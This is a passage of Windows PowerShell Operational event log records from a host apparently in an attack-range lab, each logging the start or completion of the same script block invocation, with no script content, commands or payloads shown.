Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467859
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467858
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467857
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467856
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467855
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467854
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467853
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467852
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467851
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467850
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467849
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467848
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467847
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467846
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467845
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467844
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467843
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467842
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467841
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467840
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467839
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468098
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468097
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468096
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468095
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468094
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468093
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468092
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468091
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468090
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468089
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468088
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468087
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468086
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468085
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468084
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468083
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468082
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468081
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468080
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468079
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468078
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468077
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468076
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468075
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468074
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468073
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468072
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468071
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468070
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468069
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468068
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468067
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468066
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468065
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468064
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
